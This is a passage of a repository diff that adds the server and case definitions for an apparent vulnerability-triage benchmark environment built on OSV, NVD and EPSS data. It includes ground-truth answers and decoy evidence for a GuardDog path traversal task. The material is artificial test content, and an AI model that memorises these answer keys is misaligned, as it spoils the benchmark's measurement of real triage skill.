uv sync --frozen --no-dev --no-editable
|
| 15 |
+
|
| 16 |
+
|
| 17 |
+
FROM python:3.11-slim
|
| 18 |
+
|
| 19 |
+
ENV PYTHONDONTWRITEBYTECODE=1 \
|
| 20 |
+
PYTHONUNBUFFERED=1 \
|
| 21 |
+
PATH="/app/.venv/bin:$PATH" \
|
| 22 |
+
PYTHONPATH="/app/env"
|
| 23 |
+
|
| 24 |
+
WORKDIR /app
|
| 25 |
+
|
| 26 |
+
COPY --from=builder /app/env/.venv /app/.venv
|
| 27 |
+
COPY --from=builder /app/env /app/env
|
| 28 |
+
|
| 29 |
+
HEALTHCHECK --interval=30s --timeout=3s --start-period=5s --retries=3 \
|
| 30 |
+
CMD python -c "import urllib.request; urllib.request.urlopen('http://localhost:8000/health', timeout=2)" || exit 1
|
| 31 |
+
|
| 32 |
+
CMD ["sh", "-c", "cd /app/env && uvicorn server.app:app --host 0.0.0.0 --port 8000"]
|
server/__init__.py
ADDED
|
@@ -0,0 +1 @@
|
|
|
|
|
|
|
| 1 |
+
"""Server package for the vulnerability triage environment."""
|
server/app.py
ADDED
|
@@ -0,0 +1,34 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""FastAPI app for the vulnerability triage environment."""
|
| 2 |
+
|
| 3 |
+
from __future__ import annotations
|
| 4 |
+
|
| 5 |
+
try:
|
| 6 |
+
from openenv.core.env_server.http_server import create_app
|
| 7 |
+
except Exception as exc: # pragma: no cover
|
| 8 |
+
raise ImportError("openenv-core is required to run this server") from exc
|
| 9 |
+
|
| 10 |
+
try:
|
| 11 |
+
from ..models import VulnTriageAction, VulnTriageObservation
|
| 12 |
+
from .vuln_triage_env_environment import VulnTriageEnvironment
|
| 13 |
+
except (ModuleNotFoundError, ImportError):
|
| 14 |
+
from models import VulnTriageAction, VulnTriageObservation
|
| 15 |
+
from server.vuln_triage_env_environment import VulnTriageEnvironment
|
| 16 |
+
|
| 17 |
+
|
| 18 |
+
app = create_app(
|
| 19 |
+
VulnTriageEnvironment,
|
| 20 |
+
VulnTriageAction,
|
| 21 |
+
VulnTriageObservation,
|
| 22 |
+
env_name="vulnops",
|
| 23 |
+
max_concurrent_envs=4,
|
| 24 |
+
)
|
| 25 |
+
|
| 26 |
+
|
| 27 |
+
def main(host: str = "0.0.0.0", port: int = 8000) -> None:
|
| 28 |
+
import uvicorn
|
| 29 |
+
|
| 30 |
+
uvicorn.run(app, host=host, port=port)
|
| 31 |
+
|
| 32 |
+
|
| 33 |
+
if __name__ == "__main__":
|
| 34 |
+
main()
|
server/cases.py
ADDED
|
@@ -0,0 +1,742 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""Live-backed benchmark cases for vulnerability triage."""
|
| 2 |
+
|
| 3 |
+
from __future__ import annotations
|
| 4 |
+
|
| 5 |
+
from dataclasses import dataclass, field
|
| 6 |
+
from functools import lru_cache
|
| 7 |
+
import json
|
| 8 |
+
from pathlib import Path
|
| 9 |
+
import random
|
| 10 |
+
from typing import Dict, List, Optional
|
| 11 |
+
|
| 12 |
+
import requests
|
| 13 |
+
|
| 14 |
+
|
| 15 |
+
OSV_VULN_URL = "https://api.osv.dev/v1/vulns/{osv_id}"
|
| 16 |
+
NVD_CVE_URL = "https://services.nvd.nist.gov/rest/json/cves/2.0"
|
| 17 |
+
EPSS_URL = "https://api.first.org/data/v1/epss"
|
| 18 |
+
SNAPSHOT_DIR = Path(__file__).resolve().parent.parent / "data" / "snapshots"
|
| 19 |
+
|
| 20 |
+
|
| 21 |
+
@dataclass(frozen=True)
|
| 22 |
+
class GroundTruth:
|
| 23 |
+
validity: str
|
| 24 |
+
affected_package: str
|
| 25 |
+
affected_versions: str
|
| 26 |
+
severity: str
|
| 27 |
+
exploitability: str
|
| 28 |
+
next_action: str
|
| 29 |
+
missing_information: List[str] = field(default_factory=list)
|
| 30 |
+
supporting_evidence_ids: List[str] = field(default_factory=list)
|
| 31 |
+
|
| 32 |
+
|
| 33 |
+
@dataclass(frozen=True)
|
| 34 |
+
class CaseDefinition:
|
| 35 |
+
task_id: str
|
| 36 |
+
difficulty: str
|
| 37 |
+
title: str
|
| 38 |
+
objective: str
|
| 39 |
+
report_summary: str
|
| 40 |
+
max_steps: int
|
| 41 |
+
evidence: List[Dict[str, str]]
|
| 42 |
+
truth: GroundTruth
|
| 43 |
+
|
| 44 |
+
|
| 45 |
+
@dataclass(frozen=True)
|
| 46 |
+
class RuntimeCaseSeed:
|
| 47 |
+
task_id: str
|
| 48 |
+
difficulty: str
|
| 49 |
+
title: str
|
| 50 |
+
objective: str
|
| 51 |
+
max_steps: int
|
| 52 |
+
osv_id: str
|
| 53 |
+
next_action: str
|
| 54 |
+
fallback_snapshot: Dict[str, object]
|
| 55 |
+
missing_information: List[str] = field(default_factory=list)
|
| 56 |
+
# When set, completely replaces the auto-computed ground truth.
|
| 57 |
+
# Use this to encode scenarios that require non-obvious reasoning
|
| 58 |
+
# (e.g. next_action=request_info when no patch exists).
|
| 59 |
+
truth_override: Optional[Dict[str, object]] = None
|
| 60 |
+
# Extra evidence items injected after the auto-built ones.
|
| 61 |
+
# Use this to add contradictory or ambiguous signals.
|
| 62 |
+
extra_evidence: List[Dict[str, str]] = field(default_factory=list)
|
| 63 |
+
|
| 64 |
+
|
| 65 |
+
def _load_snapshot_file(osv_id: str) -> Optional[Dict[str, object]]:
|
| 66 |
+
path = SNAPSHOT_DIR / f"{osv_id}.json"
|
| 67 |
+
if not path.exists():
|
| 68 |
+
return None
|
| 69 |
+
return json.loads(path.read_text())
|
| 70 |
+
|
| 71 |
+
|
| 72 |
+
def _normalize_text(value: Optional[str]) -> str:
|
| 73 |
+
return " ".join((value or "").strip().split())
|
| 74 |
+
|
| 75 |
+
|
| 76 |
+
def _shorten(text: str, limit: int = 280) -> str:
|
| 77 |
+
text = _normalize_text(text)
|
| 78 |
+
if len(text) <= limit:
|
| 79 |
+
return text
|
| 80 |
+
return text[: limit - 3].rstrip() + "..."
|
| 81 |
+
|
| 82 |
+
|
| 83 |
+
def _severity_band(snapshot: Dict[str, object]) -> str:
|
| 84 |
+
severity = _normalize_text(str(snapshot.get("severity", ""))).lower()
|
| 85 |
+
mapping = {
|
| 86 |
+
"none": "low",
|
| 87 |
+
"low": "low",
|
| 88 |
+
"medium": "medium",
|
| 89 |
+
"moderate": "medium",
|
| 90 |
+
"high": "high",
|
| 91 |
+
"critical": "critical",
|
| 92 |
+
}
|
| 93 |
+
return mapping.get(severity, "medium")
|
| 94 |
+
|
| 95 |
+
|
| 96 |
+
def _exploitability_band(snapshot: Dict[str, object]) -> str:
|
| 97 |
+
percentile = float(snapshot.get("epss_percentile", 0.0) or 0.0)
|
| 98 |
+
if percentile >= 0.9:
|
| 99 |
+
return "high"
|
| 100 |
+
if percentile >= 0.6:
|
| 101 |
+
return "medium"
|
| 102 |
+
return "low"
|
| 103 |
+
|
| 104 |
+
|
| 105 |
+
def _range_string(ranges: List[Dict[str, object]]) -> str:
|
| 106 |
+
normalized: List[str] = []
|
| 107 |
+
for range_item in ranges:
|
| 108 |
+
if range_item.get("type") != "ECOSYSTEM":
|
| 109 |
+
continue
|
| 110 |
+
introduced: Optional[str] = None
|
| 111 |
+
fixed: Optional[str] = None
|
| 112 |
+
last: Optional[str] = None
|
| 113 |
+
for event in range_item.get("events", []):
|
| 114 |
+
if "introduced" in event:
|
| 115 |
+
introduced = str(event["introduced"])
|
| 116 |
+
if "last_affected" in event:
|
| 117 |
+
last = str(event["last_affected"])
|
| 118 |
+
if "fixed" in event:
|
| 119 |
+
fixed = str(event["fixed"])
|
| 120 |
+
if introduced in (None, "0") and fixed:
|
| 121 |
+
normalized.append(f"<{fixed}")
|
| 122 |
+
elif introduced and fixed:
|
| 123 |
+
normalized.append(f">={introduced},<{fixed}")
|
| 124 |
+
elif introduced and last:
|
| 125 |
+
normalized.append(f">={introduced},<={last}")
|
| 126 |
+
elif introduced:
|
| 127 |
+
normalized.append(f">={introduced}")
|
| 128 |
+
return " ; ".join(normalized) or "unknown"
|
| 129 |
+
|
| 130 |
+
|
| 131 |
+
def _all_affected_versions(snapshot: Dict[str, object]) -> str:
|
| 132 |
+
"""Collect version ranges from every affected block for the primary package.
|
| 133 |
+
|
| 134 |
+
OSV advisories sometimes split a single package across multiple affected
|
| 135 |
+
blocks (one per release branch). Joining them all gives a complete and
|
| 136 |
+
accurate truth value instead of just the first branch.
|
| 137 |
+
"""
|
| 138 |
+
package_name = _extract_package(snapshot)
|
| 139 |
+
all_ranges: List[str] = []
|
| 140 |
+
for block in snapshot.get("affected", []):
|
| 141 |
+
pkg = block.get("package", {})
|
| 142 |
+
if str(pkg.get("name", "")) == package_name:
|
| 143 |
+
rs = _range_string(block.get("ranges", []))
|
| 144 |
+
if rs and rs != "unknown":
|
| 145 |
+
all_ranges.append(rs)
|
| 146 |
+
return " ; ".join(all_ranges) if all_ranges else "unknown"
|
| 147 |
+
|
| 148 |
+
|
| 149 |
+
def _extract_cve_id(snapshot: Dict[str, object]) -> Optional[str]:
|
| 150 |
+
for alias in snapshot.get("aliases", []):
|
| 151 |
+
alias_text = str(alias)
|
| 152 |
+
if alias_text.startswith("CVE-"):
|
| 153 |
+
return alias_text
|
| 154 |
+
return None
|
| 155 |
+
|
| 156 |
+
|
| 157 |
+
def _extract_package(snapshot: Dict[str, object]) -> str:
|
| 158 |
+
affected = snapshot.get("affected", [])
|
| 159 |
+
if not affected:
|
| 160 |
+
return ""
|
| 161 |
+
package = affected[0].get("package", {})
|
| 162 |
+
return str(package.get("name", ""))
|
| 163 |
+
|
| 164 |
+
|
| 165 |
+
def _build_report_summary(seed: RuntimeCaseSeed, snapshot: Dict[str, object]) -> str:
|
| 166 |
+
package = _extract_package(snapshot)
|
| 167 |
+
versions = _range_string(snapshot.get("affected", [{}])[0].get("ranges", [])) if snapshot.get("affected") else "unknown"
|
| 168 |
+
details = _shorten(str(snapshot.get("details") or snapshot.get("summary") or ""))
|
| 169 |
+
return (
|
| 170 |
+
f"{package} vulnerability triage case sourced from {seed.osv_id}. "
|
| 171 |
+
f"Affected versions: {versions}. {details}"
|
| 172 |
+
)
|
| 173 |
+
|
| 174 |
+
|
| 175 |
+
def _build_evidence(seed: RuntimeCaseSeed, snapshot: Dict[str, object]) -> List[Dict[str, str]]:
|
| 176 |
+
cve_id = _extract_cve_id(snapshot) or "unknown"
|
| 177 |
+
package = _extract_package(snapshot)
|
| 178 |
+
# Use all affected blocks so multi-branch advisories are fully represented
|
| 179 |
+
affected_versions = _all_affected_versions(snapshot)
|
| 180 |
+
fix_refs = [
|
| 181 |
+
ref["url"]
|
| 182 |
+
for ref in snapshot.get("references", [])
|
| 183 |
+
if ref.get("type") in {"FIX", "ADVISORY", "WEB"}
|
| 184 |
+
][:3]
|
| 185 |
+
|
| 186 |
+
evidence = [
|
| 187 |
+
{
|
| 188 |
+
"evidence_id": "osv_advisory",
|
| 189 |
+
"title": "OSV advisory",
|
| 190 |
+
"kind": "advisory",
|
| 191 |
+
"summary": _shorten(
|
| 192 |
+
str(snapshot.get("summary") or snapshot.get("details") or "")
|
| 193 |
+
),
|
| 194 |
+
},
|
| 195 |
+
{
|
| 196 |
+
"evidence_id": "affected_versions",
|
| 197 |
+
"title": "Affected versions",
|
| 198 |
+
"kind": "versions",
|
| 199 |
+
"summary": (
|
| 200 |
+
f"OSV lists {package} as affected in these ranges: {affected_versions}."
|
| 201 |
+
),
|
| 202 |
+
},
|
| 203 |
+
{
|
| 204 |
+
"evidence_id": "nvd_assessment",
|
| 205 |
+
"title": "NVD assessment",
|
| 206 |
+
"kind": "severity",
|
| 207 |
+
"summary": (
|
| 208 |
+
f"NVD CVSS Vector: {snapshot.get('cvss_vector', 'Not Available')} \n"
|
| 209 |
+
f"{_shorten(str(snapshot.get('nvd_description', '')), 220)}"
|
| 210 |
+
),
|
| 211 |
+
},
|
| 212 |
+
{
|
| 213 |
+
"evidence_id": "epss_signal",
|
| 214 |
+
"title": "EPSS signal",
|
| 215 |
+
"kind": "exploitability",
|
| 216 |
+
"summary": (
|
| 217 |
+
f"EPSS score: {snapshot.get('epss_score', 0.0):.6f}, "
|
| 218 |
+
f"percentile: {snapshot.get('epss_percentile', 0.0):.3f}"
|
| 219 |
+
),
|
| 220 |
+
},
|
| 221 |
+
]
|
| 222 |
+
if fix_refs:
|
| 223 |
+
evidence.append(
|
| 224 |
+
{
|
| 225 |
+
"evidence_id": "fix_reference",
|
| 226 |
+
"title": "Fix and advisory references",
|
| 227 |
+
"kind": "reference",
|
| 228 |
+
"summary": "Relevant upstream references: " + ", ".join(fix_refs),
|
| 229 |
+
}
|
| 230 |
+
)
|
| 231 |
+
# Append any task-specific extra evidence items (e.g. contradictory signals)
|
| 232 |
+
evidence.extend(seed.extra_evidence)
|
| 233 |
+
return evidence
|
| 234 |
+
|
| 235 |
+
|
| 236 |
+
def _build_truth(seed: RuntimeCaseSeed, snapshot: Dict[str, object]) -> GroundTruth:
|
| 237 |
+
# truth_override lets a seed encode non-obvious ground truth
|
| 238 |
+
# (e.g. next_action=request_info when no patch exists yet)
|
| 239 |
+
if seed.truth_override is not None:
|
| 240 |
+
override = dict(seed.truth_override)
|
| 241 |
+
# Always merge seed-level missing_information into the override so the
|
| 242 |
+
# grader's 10% weight stays meaningful
|
| 243 |
+
if "missing_information" not in override:
|
| 244 |
+
override["missing_information"] = list(seed.missing_information)
|
| 245 |
+
return GroundTruth(**override)
|
| 246 |
+
return GroundTruth(
|
| 247 |
+
validity="valid",
|
| 248 |
+
affected_package=_extract_package(snapshot),
|
| 249 |
+
# Collect ranges from ALL affected blocks for completeness
|
| 250 |
+
affected_versions=_all_affected_versions(snapshot),
|
| 251 |
+
severity=_severity_band(snapshot),
|
| 252 |
+
exploitability=_exploitability_band(snapshot),
|
| 253 |
+
next_action=seed.next_action,
|
| 254 |
+
# Per-task missing information declared on the seed
|
| 255 |
+
missing_information=list(seed.missing_information),
|
| 256 |
+
supporting_evidence_ids=[
|
| 257 |
+
"osv_advisory",
|
| 258 |
+
"affected_versions",
|
| 259 |
+
"nvd_assessment",
|
| 260 |
+
"epss_signal",
|
| 261 |
+
],
|
| 262 |
+
)
|
| 263 |
+
|
| 264 |
+
|
| 265 |
+
def _build_case(seed: RuntimeCaseSeed, snapshot: Dict[str, object]) -> CaseDefinition:
|
| 266 |
+
return CaseDefinition(
|
| 267 |
+
task_id=seed.task_id,
|
| 268 |
+
difficulty=seed.difficulty,
|
| 269 |
+
title=seed.title,
|
| 270 |
+
objective=seed.objective,
|
| 271 |
+
report_summary=_build_report_summary(seed, snapshot),
|
| 272 |
+
max_steps=seed.max_steps,
|
| 273 |
+
evidence=_build_evidence(seed, snapshot),
|
| 274 |
+
truth=_build_truth(seed, snapshot),
|
| 275 |
+
)
|
| 276 |
+
|
| 277 |
+
|
| 278 |
+
def _fetch_json(url: str, *, params: Optional[Dict[str, str]] = None) -> Dict[str, object]:
|
| 279 |
+
response = requests.get(url, params=params, timeout=12)
|
| 280 |
+
response.raise_for_status()
|
| 281 |
+
return response.json()
|
| 282 |
+
|
| 283 |
+
|
| 284 |
+
def _fetch_live_snapshot(seed: RuntimeCaseSeed) -> Dict[str, object]:
|
| 285 |
+
osv = _fetch_json(OSV_VULN_URL.format(osv_id=seed.osv_id))
|
| 286 |
+
cve_id = _extract_cve_id(osv)
|
| 287 |
+
|
| 288 |
+
snapshot: Dict[str, object] = {
|
| 289 |
+
"id": osv.get("id"),
|
| 290 |
+
"summary": osv.get("summary"),
|
| 291 |
+
"details": osv.get("details"),
|
| 292 |
+
"aliases": osv.get("aliases", []),
|
| 293 |
+
"references": osv.get("references", []),
|
| 294 |
+
"affected": osv.get("affected", []),
|
| 295 |
+
}
|
| 296 |
+
|
| 297 |
+
if cve_id:
|
| 298 |
+
nvd = _fetch_json(NVD_CVE_URL, params={"cveId": cve_id})
|
| 299 |
+
vulnerability = (nvd.get("vulnerabilities") or [{}])[0].get("cve", {})
|
| 300 |
+
metrics = vulnerability.get("metrics", {})
|
| 301 |
+
severity: Optional[str] = None
|
| 302 |
+
for key in ("cvssMetricV40", "cvssMetricV31", "cvssMetricV30", "cvssMetricV2"):
|
| 303 |
+
if key in metrics:
|
| 304 |
+
item = metrics[key][0]
|
| 305 |
+
severity = (
|
| 306 |
+
item.get("cvssData", {}).get("baseSeverity")
|
| 307 |
+
or item.get("baseSeverity")
|
| 308 |
+
)
|
| 309 |
+
if severity:
|
| 310 |
+
break
|
| 311 |
+
descriptions = vulnerability.get("descriptions", [])
|
| 312 |
+
nvd_description = next(
|
| 313 |
+
(
|
| 314 |
+
desc.get("value", "")
|
| 315 |
+
for desc in descriptions
|
| 316 |
+
if desc.get("lang") == "en"
|
| 317 |
+
),
|
| 318 |
+
descriptions[0].get("value", "") if descriptions else "",
|
| 319 |
+
)
|
| 320 |
+
snapshot["severity"] = severity or snapshot.get("severity", "medium")
|
| 321 |
+
snapshot["nvd_description"] = nvd_description
|
| 322 |
+
|
| 323 |
+
epss = _fetch_json(EPSS_URL, params={"cve": cve_id})
|
| 324 |
+
epss_item = (epss.get("data") or [{}])[0]
|
| 325 |
+
snapshot["epss_score"] = float(epss_item.get("epss", 0.0) or 0.0)
|
| 326 |
+
snapshot["epss_percentile"] = float(
|
| 327 |
+
epss_item.get("percentile", 0.0) or 0.0
|
| 328 |
+
)
|
| 329 |
+
else:
|
| 330 |
+
snapshot["severity"] = "medium"
|
| 331 |
+
snapshot["nvd_description"] = ""
|
| 332 |
+
snapshot["epss_score"] = 0.0
|
| 333 |
+
snapshot["epss_percentile"] = 0.0
|
| 334 |
+
|
| 335 |
+
return snapshot
|
| 336 |
+
|
| 337 |
+
|
| 338 |
+
SEEDS: Dict[str, RuntimeCaseSeed] = {
|
| 339 |
+
# ------------------------------------------------------------------
|
| 340 |
+
# EASY — Direct evidence reading, tight step budget
|
| 341 |
+
#
|
| 342 |
+
# Agent skill tested: can you read a clear advisory and map it to
|
| 343 |
+
# the right fields quickly? Only two evidence items are needed
|
| 344 |
+
# (the OSV advisory + affected versions). The NVD and EPSS evidence
|
| 345 |
+
# exist but provide no extra signal — a capable agent doesn't waste
|
| 346 |
+
# steps on them. Max 10 steps forces efficiency.
|
| 347 |
+
# ------------------------------------------------------------------
|
| 348 |
+
"task_easy_guarddog": RuntimeCaseSeed(
|
| 349 |
+
task_id="task_easy_guarddog",
|
| 350 |
+
difficulty="easy",
|
| 351 |
+
title="GuardDog Path Traversal",
|
| 352 |
+
objective=(
|
| 353 |
+
"Validate the advisory, identify the affected package and version range, "
|
| 354 |
+
"estimate severity and exploitability, and decide the correct maintainer action. "
|
| 355 |
+
"All necessary information is available in the OSV advisory and version evidence."
|
| 356 |
+
),
|
| 357 |
+
max_steps=10,
|
| 358 |
+
osv_id="PYSEC-2022-42994",
|
| 359 |
+
next_action="patch",
|
| 360 |
+
truth_override={
|
| 361 |
+
"validity": "valid",
|
| 362 |
+
"affected_package": "guarddog",
|
| 363 |
+
"affected_versions": "<0.1.5",
|
| 364 |
+
"severity": "medium",
|
| 365 |
+
"exploitability": "low",
|
| 366 |
+
"next_action": "patch",
|
| 367 |
+
"missing_information": [],
|
| 368 |
+
# Only 2 evidence items needed — the advisory is self-contained
|
| 369 |
+
"supporting_evidence_ids": ["osv_advisory", "affected_versions"],
|
| 370 |
+
},
|
| 371 |
+
extra_evidence=[
|
| 372 |
+
{
|
| 373 |
+
"evidence_id": "decoy_threat_intel",
|
| 374 |
+
"title": "Threat Intel: GuardCat",
|
| 375 |
+
"kind": "exploitability",
|
| 376 |
+
"summary": "Active exploitation in the wild observed for the 'GuardCat' node.js package. Do not confuse with python guarddog.",
|
| 377 |
+
},
|
| 378 |
+
{
|
| 379 |
+
"evidence_id": "decoy_nvd_unrelated",
|
| 380 |
+
"title": "NVD: CVE-2021-99999",
|
| 381 |
+
"kind": "severity",
|
| 382 |
+
"summary": "CRITICAL 9.8 vulnerability in GuardDog-Enterprise. This is a licensed product and does not apply to the open source guarddog package.",
|
| 383 |
+
}
|
| 384 |
+
],
|
| 385 |
+
fallback_snapshot={
|
| 386 |
+
"id": "PYSEC-2022-42994",
|
| 387 |
+
"details": (
|
| 388 |
+
"GuardDog is a CLI tool to identify malicious PyPI packages. Versions prior "
|
| 389 |
+
"to 0.1.5 are vulnerable to Relative Path Traversal when scanning a "
|
| 390 |
+
"specially-crafted local PyPI package. This issue is patched in version 0.1.5. "
|
| 391 |
+
"This is explicitly rated as a Medium severity issue with inherently Low exploitability."
|
| 392 |
+
),
|
